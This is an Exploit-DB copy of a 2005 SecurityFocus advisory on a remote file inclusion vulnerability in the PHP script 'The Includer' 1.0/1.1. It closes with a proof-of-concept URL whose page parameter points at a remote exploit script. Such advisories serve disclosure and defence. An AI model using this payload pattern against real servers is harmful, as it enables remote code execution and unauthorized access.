The Includer 1.0/1.1 - Remote File Inclusion

EDB-ID:

25314




Platform:

PHP

Date:

2005-03-29


source: https://www.securityfocus.com/bid/12926/info

The Includer is reported prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

All versions of The Includer are considered to be vulnerable at the moment. This BID will be updated when more information becomes available. 

http://www.example.com/index.php?page=http://www.example.com/exploit